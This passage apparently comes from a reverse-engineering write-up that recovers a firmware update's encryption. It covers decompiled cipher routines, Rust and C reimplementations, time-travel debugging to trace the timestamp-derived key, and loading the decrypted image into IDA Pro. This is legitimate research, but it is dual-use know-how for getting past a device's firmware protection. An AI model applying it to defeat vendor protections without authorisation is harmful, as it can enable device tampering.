      v10 = *(_BYTE *)(i + 48 * v9 + v3 + 5) ^ a2[(unsigned __int8)byte_424E51[i] + 31];
      v11 = v28;
      *(&v35 + i) = v10;

      // snip

      // v18 gets written to the scratch buffer at the end of the loop...
      v18 = *(_BYTE *)(i + 48 * v17 + v3 + 9) ^ a2[(unsigned __int8)byte_424E55[i] + 31];

      // this was probably the *real* last statement of the for-loop
      // i.e. for (int i = 0; i < 48; i += 6)
      i += 6;
    }

Build a 32-byte buffer containing data from an 0x800-byte static table, with indexes into this table originating from indices built from the buffer in step #1. Combine this 32-byte buffer with the 48-byte buffer in step #1.

// dword_424E80 -- some static data
    // (unsigned __int8)v38[0] + 2) -- the original decompiler output has this wrong.
    //     v33 should be a 52-byte buffer which consumes v38, so v38 is actually data set up in
    //     the loop above.
    // (32 * v34 + 2) -- v34 should be some data from the above loop as well. This looks like
    //     a binary shift optimization
    // repeat with different multipliers...
    //
    // This can be simplified as:
    //     size_t index  = ((v34 << 5) + 2)
    //                     | ((v37[1] << 4) + 2)
    //                     | ((v35 << 3) + 2)
    //                     | ((v36 << 2) + 2)
    //                     | ((v37 << 1) + 2)
    //                     | v38[0]
    //     v32[1] = *(int*)(((char*)&dword_424e80)[index])
    v32[1] = *(int *)((char *)&dword_424E80
                    + (((unsigned __int8)v38[0] + 2) | (32 * v34 + 2) | (16 * (unsigned __int8)v38[1] + 2) | (8 * v35 + 2) | (4 * v36 + 2) | (2 * v37 + 2)));
    // repeat 7 times. each time the reference to dword_424e80 is shifted forward by 0x100.
    // note: if you do the math, the next line uses dword_424e80[64]. We shift by 0x100 instead of
    // 64 because is misleading because dword_424e80 is declared as an int array -- not a char array.

Iterate over the next 8 bytes of the output buffer. For each byte index of the output buffer, index into yet another static 32-byte buffer and use that as the index into the table from step #2. XOR this value with the value at the current index of the output buffer.

// Not really sure why this calculation works like this. It ends up just being `unk_425681`'s address
// when it's used.
    v19 = (char *)(&unk_425681 - (_UNKNOWN *)a2);
    v20 = &unk_425680 - (_UNKNOWN *)a2;

// v4 is a number that's decremented on every iteration -- possibly bytes remaining?
    if ( v4 <= 0 )
    {
        // Loop over 8 bytes
      v30 = 8;
      do
      {
        // Start XORing the output bytes with some of the data generated in step 2.
        //
        // Cheating here and doing the "draw the rest of the owl", but if you observe that
        // we use `unk_425680` (v20), `unk_425681` (v19), `unk_425682`, and byte_425683, the
        // the decompiler generated suboptimal code. We can simplify to be relative to just
        // `unk_425680`
        //
        // *result ^= step2_bytes[unk_425680[output_index] - 1]
        *result ^= *((_BYTE *)v32 + (unsigned __int8)result[v20] + 3);

        // result[1] ^= step2_bytes[unk_425680[output_index] + 1]
        result[1] ^= *((_BYTE *)v32 + (unsigned __int8)v19[(_DWORD)result] + 3);

        // result[2] ^= step2_bytes[unk_425680[output_index] + 2]
        result[2] ^= *((_BYTE *)v32 + (unsigned __int8)result[&unk_425682 - (_UNKNOWN *)a2] + 3);

        // result[3] ^= step2_bytes[unk_425680[output_index] + 3]
        result[3] ^= *((_BYTE *)v32 + (unsigned __int8)result[byte_425683 - a2] + 3);
        // Move our our pointer to the output buffer forward by 4 bytes
        result += 4;
        --v30;
      }
      while ( v30 );
    }
    else
    {
        // loop over 8 bytes
      v29 = 8;
      do
      {
        // grab the byte at 0x20, we're swapping this later
        v24 = result[32];

        // v22 = *result ^ step2_bytes[unk_425680[output_index] - 1]
        v22 = *result ^ *((_BYTE *)v32 + (unsigned __int8)result[v20] + 3);

        // I'm not sure why the output buffer pointer is incremented here, but
        // this really makes the code ugly
        result += 4;

        // Write the byte generated above to offset 0x1c
        result[28] = v22;
        // Write the byte at 0x20 to offset 0
        *(result - 4) = v24;

        // rinse, repeat with slightly different offsets each time...
        v25 = result[29];
        result[29] = *(result - 3) ^ *((_BYTE *)v32 + (unsigned __int8)result[(_DWORD)v19 - 4] + 3);
        *(result - 3) = v25;
        v26 = result[30];
        result[30] = *(result - 2) ^ *((_BYTE *)v32 + (unsigned __int8)result[&unk_425682 - (_UNKNOWN *)a2 - 4] + 3);
        *(result - 2) = v26;
        v27 = result[31];
        result[31] = *(result - 1) ^ *((_BYTE *)v32 + (unsigned __int8)result[byte_425683 - a2 - 4] + 3);
        *(result - 1) = v27;
        --v29;
      }
      while ( v29 );
    }

The inner loop in the 

else
 branch above I think is kind of nasty, so here it is reimplemented in Rust:

for _ in 0..8 {
    // we swap the `first` index with the `second`
    for (first, second) in (0x1c..=0x1f).zip(0..4) {
        let original_byte_idx = first + output_offset + 4;

        let original_byte = outbuf[original_byte_idx];

        let constant = unk_425680[output_offset + second] as usize;

        let new_byte = outbuf[output_offset + second] ^ generated_bytes_from_step2[constant - 1];

        let new_idx = original_byte_idx;
        outbuf[new_idx] = new_byte;
        outbuf[output_offset + second] = original_byte;
    }

    output_offset += 4;
}

Key Setup

We now need to figure out how our key is set up for usage in the 

decrypt_data
 function above. My approach here is to set a breakpoint at the first instruction to use the key data in 
decrypt_data
, which happens to be 
xor bl, [ecx + esi + 4]
 at 
0x4079d3
. I know this is where we should break because in the decompiler output the left-hand side of the XOR operation, the key material, will be the second operand in the 
xor
 instruction. As a reminder, the decompiler shows the XOR as:

v8 = *(_BYTE *)(i + 48 * v7 + v3 + 4) ^ a2[(unsigned __int8)byte_424E50[i] + 31];

The breakpoint is hit and the address we’re loading from is 

0x19f5c4
. We can now lean on TTD to help us figure out where this data was last written. Set a 1-byte memory write breakpoint at this address using 
ba w1 0x19f5c4
 and press the 
Go Back
 button. If you’ve never used TTD before, this operates exactly as 
Go
 would except backwards in the program’s trace. In this case it will execute backward until either a breakpoint is hit, interrupt is generated, or we reach the start of the program.

Our memory write breakpoint gets triggered at 

0x4078fb
 — a function we haven’t seen before. The callstack shows that it’s called not terribly far from the 
decrypt_update_info
 routine!

  • set_key
     (we are here — function is originally called 
    sub_407850
    )
  • sub_4082c0
  • decrypt_update_info

What’s 

sub_4082c0
?

Not a lot to see here except the same function called 4 times, initially with the timestamp string as an argument in position 0, a 64-byte buffer, and bunch of function calls using the return value of the last as its input. The function our debugger just broke into takes only 1 argument, which is the 64-byte buffer used across all of these function calls. So what’s going on in 

sub_407e80
?

The bitwise operations that look supsiciously similar to the byte to bit inflation we saw above with the firmware data. After renaming things and performing some loop unrolling, things look like this:

// sub_407850
int inflate_timestamp(void *this, char *timestamp_str, char *output, uint8_t *key) {
    for (size_t output_idx = 0; output_idx < 8; output_idx++) {
        uint8_t ts_byte = *timestamp_str;
        if (ts_byte) {
            timestamp_str += 1;
        }

        for (int bit_idx = 0; bit_idx < 8; bit_idx++) {
            uint8_t bit_value = (ts_byte >> (7 - bit_idx)) & 1;
            output[(output_idx * 8) + bit_idx] ^= bit_value;
        }
    }

    set_key(this, key);
    decrypt_data(this, output, 1);

    return timestamp_str;
}

// sub_4082c0
int set_key_to_timestamp(void *this, char *timestamp_str) {
    uint8_t key_buf[64];
    memset(&key_buf, 0, sizeof(key_buf));

    char *str_ptr = inflate_timestamp(this, timestamp_str, &key_buf, &static_key_1);
    str_ptr = inflate_timestamp(this, str_ptr, &key_buf, &static_key_2);
    str_ptr = inflate_timestamp(this, str_ptr, &key_buf, &static_key_3);
    inflate_timestamp(this, str_ptr, &key_buf, &static_key_4);

    set_key(this, &key_buf);
}

The only mystery now is the 

set_key
 routine:

int __thiscall set_key(char *this, const void *a2)
{
  _DWORD *v2; // ebp
  char *v3; // edx
  char v4; // al
  char v5; // al
  char v6; // al
  char v7; // al
  int result; // eax
  char v10[56]; // [esp+Ch] [ebp-3Ch] BYREF

  qmemcpy(v10, a2, sizeof(v10));
  v2 = &unk_424DE0;
  v3 = this + 5;
  do
  {
    v4 = v10[0];
    qmemcpy(v10, &v10[1], 0x1Bu);
    v10[27] = v4;
    v5 = v10[28];
    qmemcpy(&v10[28], &v10[29], 0x1Bu);
    v10[55] = v5;
    if ( *v2 == 2 )
    {
      v6 = v10[0];
      qmemcpy(v10, &v10[1], 0x1Bu);
      v10[27] = v6;
      v7 = v10[28];
      qmemcpy(&v10[28], &v10[29], 0x1Bu);
      v10[55] = v7;
    }
    for ( result = 0; result < 48; result += 6 )
    {
      v3[result - 1] = v10[(unsigned __int8)byte_424E20[result] - 1];
      v3[result] = v10[(unsigned __int8)byte_424E21[result] - 1];
      v3[result + 1] = v10[(unsigned __int8)byte_424E22[result] - 1];
      v3[result + 2] = v10[(unsigned __int8)byte_424E23[result] - 1];
      v3[result + 3] = v10[(unsigned __int8)byte_424E24[result] - 1];
      v3[result + 4] = v10[(unsigned __int8)byte_424E25[result] - 1];
    }
    ++v2;
    v3 += 48;
  }
  while ( (int)v2 < (int)byte_424E20 );
  return result;
}

This function is a bit more straightforward to reimplement:

void set_key(void *this, uint8_t *key) {
    uint8_t scrambled_key[56];
    memcpy(&scrambled_key, key, sizeof(scrambled_key));

    for (size_t i = 0; i < 16; i++) {
        size_t swap_rounds = 1;
        if (((uint32_t*)GLOBAL_KEY_ROUNDS_CONFIG)[i] == 2) {
            swap_rounds = 2;
        }

        for (int i = 0; i < swap_rounds; i++) {
            uint8_t temp = scrambled_key[0];
            memcpy(&scrambled_key, &scrambled_key[1], 27);
            scrambled_key[27] = temp;

            temp = scrambled_key[28];
            memcpy(&scrambled_key[28], &scrambled_key[29], 27);
            scrambled_key[55] = temp;
        }

        for (size_t swap_idx = 0; swap_idx < 48; swap_idx++) {
            size_t scrambled_key_idx = GLOBAL_KEY_SWAP_TABLE[swap_idx] - 1;

            size_t persistent_key_idx = swap_idx + (i * 48);
            this->key[persistent_key_idx] = scrambled_key[scrambled_key_idx];
        }
    }
}

Putting Everything Together

  1. Update data is read from resources
  2. The first 4 bytes of the update data are a Unix timestamp
  3. The timestamp is formatted as a string, has each byte inflated to its bit representation, and decrypted using some static key material as the key. This is repeated 4 times with the output of the previous run used as an input to the next.
  4. The resulting data from step 3 is used as a key for decrypting data.
  5. The remainder of the firmware update image is inflated to its bit representation 8 bytes at a time and uses the dynamic key and 3 other unique static lookup tables to transform the inflated input data.
  6. The result from step 5 is deflated back into its byte representation.

My decryption utility which completely reimplements this magic in Rust can be found at https://github.com/landaire/porkchop.

Loading the Firmware in IDA Pro

IDA thankfully supports disassembling the Hitachi/Rensas H8SX architecture. If we load our firmware into IDA and select the «Hitachi H8SX advanced» processsor type, use the default options for the «Disassembly memory organization» dialog, then finally choose «H8S/2215R» in the «Choose the device name» dialog…:

We don’t have shit. I’m not an embedded systems expert, but my friend suggested that the first few DWORDs look like they may belong to a vector table. If we right-click address 0 and select «Double word 0x142A», we can click on the new variable 

unk_142A
 to go to its location. Press 
C
 at this location to define it as Code, then press 
P
 to create a function at this address:

We can now reverse engineer our firmware 🙂